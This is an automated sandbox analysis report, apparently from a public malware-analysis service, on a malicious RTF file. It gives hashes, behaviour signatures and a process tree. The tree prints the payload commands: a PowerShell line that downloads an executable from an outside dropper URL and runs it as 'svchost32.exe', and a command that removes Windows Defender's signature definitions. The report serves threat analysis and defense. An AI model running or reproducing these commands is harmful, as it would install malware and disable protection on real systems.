Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Analysis

  • max time kernel
    137s
  • max time network
    130s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240910-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240910-enlocale:en-usos:windows10-2004-x64system
  • submitted
    28/09/2024, 07:31

General

  • Target

    fbcc5c125e18019a5e6e536a47d5a1a8_JaffaCakes118.rtf

  • Size

    750KB

  • MD5

    fbcc5c125e18019a5e6e536a47d5a1a8

  • SHA1

    8c3b235607fe39ee44accbec28887547adf33550

  • SHA256

    7d99a30ca8f89ca4ad64055e2ec39e67fb07639e03ebc773b6375b742a7f1162

  • SHA512

    23d2e97b1b11588818244a10e9084beb5df2c4eb99f1eab145d5118dc7eb817501557144bb1dfba0133eab6a5f4af73546dfc33aa50a4b53e600094fbd36a535

  • SSDEEP

    12288:OuqyHuqyNuqy/uqySuqyKuqypuqyWuqymuqy/uqyzS:zqyOqyAqy2qyPqy3qykqyLqybqy2qyW

Score
10/10

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://panelonetwothree.ga/work/15.exe

Signatures

  • Process spawned unexpected child process 4 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Command and Scripting Interpreter: PowerShell 1 TTPs 3 IoCs

    Start PowerShell.

  • Checks processor information in registry 2 TTPs 6 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Enumerates system info in registry 2 TTPs 6 IoCs
  • Kills process with taskkill 2 IoCs
  • Suspicious behavior: AddClipboardFormatListener 2 IoCs
  • Suspicious behavior: EnumeratesProcesses 6 IoCs
  • Suspicious use of AdjustPrivilegeToken 4 IoCs
  • Suspicious use of SetWindowsHookEx 7 IoCs
  • Suspicious use of WriteProcessMemory 12 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

  • Uses Volume Shadow Copy WMI provider

    The Volume Shadow Copy service is used to manage backups/snapshots.

  • Uses Volume Shadow Copy service COM API

    The Volume Shadow Copy service is used to manage backups/snapshots.

Processes

  • C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE
    "C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\fbcc5c125e18019a5e6e536a47d5a1a8_JaffaCakes118.rtf" /o ""
    1⤵
    • Checks processor information in registry
    • Enumerates system info in registry
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    PID:2428
  • C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE
    "C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" -Embedding
    1⤵
    • Checks processor information in registry
    • Enumerates system info in registry
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:2764
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" (New-Object System.Net.WebClient).DownloadFile('http://panelonetwothree.ga/work/15.exe','C:\Users\Public\svchost32.exe');Start-Process 'C:\Users\Public\svchost32.exe'
      2⤵
      • Process spawned unexpected child process
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:4452
    • C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c taskkill /f /im winword.exe & exit
      2⤵
      • Process spawned unexpected child process
      • Suspicious use of WriteProcessMemory
      PID:364
      • C:\Windows\system32\taskkill.exe
        taskkill /f /im winword.exe
        3⤵
        • Kills process with taskkill
        • Suspicious use of AdjustPrivilegeToken
        PID:1772
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden taskkill /f /im Excel.exe
      2⤵
      • Process spawned unexpected child process
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:4468
      • C:\Windows\system32\taskkill.exe
        "C:\Windows\system32\taskkill.exe" /f /im Excel.exe
        3⤵
        • Kills process with taskkill
        • Suspicious use of AdjustPrivilegeToken
        PID:2192
    • C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c cd "C:\Program Files\Windows Defender" & MpCmdRun.exe -removedefinitions -dynamicsignatures & exit
      2⤵
      • Process spawned unexpected child process
      PID:2132

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

    Filesize

    2KB

    MD5

    d85ba6ff808d9e5444a4b369f5bc2730

    SHA1

    31aa9d96590fff6981b315e0b391b575e4c0804a

    SHA256

    84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

    SHA512

    8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

  • C:\Users\Admin\AppData\Local\Microsoft\TokenBroker\Cache\089d66ba04a8cec4bdc5267f42f39cf84278bb67.tbres

    Filesize

    2KB

    MD5

    57f4881fe81cc736f42ec947b2513ef3

    SHA1

    c5fa245c81764cad6da01e8fff33c7f6eab215b3

    SHA256

    f758038354d827688ed6914cb056434616d4d5ed7be942535c2fb2cb714529f1

    SHA512

    9e967ae683792a5b6bf1473a7421a46d80750a1761917f1238b462ef7053009400fae23e11ef10b0e3676ebd497ea90fca515b2e83f5b60f325536884a44445b

  • C:\Users\Admin\AppData\Local\Microsoft\TokenBroker\Cache\49dbe2955480c7f6ef8cec9c4320c9868d9293fd.tbres

    Filesize

    2KB

    MD5

    269a1ec6c28d181e61ffb0188641b7fd

    SHA1

    a038299d25c20165fc698cbef211655807920f66

    SHA256

    733dcfc079a89ede3b8ed1a01357e1c51bef223a24dfd738ff5b950f0fe2de7d

    SHA512

    8638747c0710e371c853854801bfe0330c13b69f7ddbfe5925d8832c7b755df235d19b0ce68f69767b0e58b955dab47083d2e6395dd3990687797ee0ee9bd8a9

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

    Filesize

    1KB

    MD5

    0ab03b4ab0ee8273a1eea28cef1ca1e7

    SHA1

    8a305ca40e71bd2b04b20c65e28730e3ff3f50b2

    SHA256

    695a48145171a84d61778fe33c410d3195109c7c59a2b1038a1f3ca14c52a3ed

    SHA512

    7347810d3c514b343def26aa42e4b758fc1cdd8a9e57c529de49615b995c8c1dab942d83d432a5ee6e022bbefd020d6b1d920ffa61a9ca2617ff8b67ce3c4f72

  • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_zyqxwkta.piy.ps1

    Filesize

    60B

    MD5

    d17fe0a3f47be24a6453e9ef58c94641

    SHA1

    6ab83620379fc69f80c0242105ddffd7d98d5d9d

    SHA256

    96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

    SHA512

    5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

  • memory/2428-15-0x00007FFE6CD90000-0x00007FFE6CF85000-memory.dmp

    Filesize

    2.0MB

  • memory/2428-19-0x00007FFE6CD90000-0x00007FFE6CF85000-memory.dmp

    Filesize

    2.0MB

  • memory/2428-9-0x00007FFE6CD90000-0x00007FFE6CF85000-memory.dmp

    Filesize

    2.0MB

  • memory/2428-7-0x00007FFE6CD90000-0x00007FFE6CF85000-memory.dmp

    Filesize

    2.0MB

  • memory/2428-6-0x00007FFE6CD90000-0x00007FFE6CF85000-memory.dmp

    Filesize

    2.0MB

  • memory/2428-14-0x00007FFE6CD90000-0x00007FFE6CF85000-memory.dmp

    Filesize

    2.0MB

  • memory/2428-13-0x00007FFE6CD90000-0x00007FFE6CF85000-memory.dmp

    Filesize

    2.0MB

  • memory/2428-16-0x00007FFE2A9E0000-0x00007FFE2A9F0000-memory.dmp

    Filesize

    64KB

  • memory/2428-12-0x00007FFE6CD90000-0x00007FFE6CF85000-memory.dmp

    Filesize

    2.0MB

  • memory/2428-11-0x00007FFE6CD90000-0x00007FFE6CF85000-memory.dmp

    Filesize

    2.0MB

  • memory/2428-10-0x00007FFE6CD90000-0x00007FFE6CF85000-memory.dmp

    Filesize

    2.0MB

  • memory/2428-1-0x00007FFE6CE2D000-0x00007FFE6CE2E000-memory.dmp

    Filesize

    4KB

  • memory/2428-18-0x00007FFE6CD90000-0x00007FFE6CF85000-memory.dmp

    Filesize

    2.0MB

  • memory/2428-20-0x00007FFE2A9E0000-0x00007FFE2A9F0000-memory.dmp

    Filesize

    64KB

  • memory/2428-17-0x00007FFE6CD90000-0x00007FFE6CF85000-memory.dmp

    Filesize

    2.0MB

  • memory/2428-0-0x00007FFE2CE10000-0x00007FFE2CE20000-memory.dmp

    Filesize

    64KB

  • memory/2428-2-0x00007FFE2CE10000-0x00007FFE2CE20000-memory.dmp

    Filesize

    64KB

  • memory/2428-5-0x00007FFE2CE10000-0x00007FFE2CE20000-memory.dmp

    Filesize

    64KB

  • memory/2428-82-0x00007FFE6CD90000-0x00007FFE6CF85000-memory.dmp

    Filesize

    2.0MB

  • memory/2428-4-0x00007FFE2CE10000-0x00007FFE2CE20000-memory.dmp

    Filesize

    64KB

  • memory/2428-3-0x00007FFE2CE10000-0x00007FFE2CE20000-memory.dmp

    Filesize

    64KB

  • memory/2428-8-0x00007FFE6CD90000-0x00007FFE6CF85000-memory.dmp

    Filesize

    2.0MB

  • memory/2764-40-0x00007FFE6CD90000-0x00007FFE6CF85000-memory.dmp

    Filesize

    2.0MB

  • memory/2764-41-0x00007FFE6CD90000-0x00007FFE6CF85000-memory.dmp

    Filesize

    2.0MB

  • memory/2764-43-0x00007FFE6CD90000-0x00007FFE6CF85000-memory.dmp

    Filesize

    2.0MB

  • memory/2764-83-0x00007FFE6CD90000-0x00007FFE6CF85000-memory.dmp

    Filesize

    2.0MB

  • memory/2764-42-0x00007FFE6CD90000-0x00007FFE6CF85000-memory.dmp

    Filesize

    2.0MB

  • memory/2764-35-0x00007FFE6CD90000-0x00007FFE6CF85000-memory.dmp

    Filesize

    2.0MB

  • memory/4468-68-0x000001DAA0A70000-0x000001DAA0A92000-memory.dmp

    Filesize

    136KB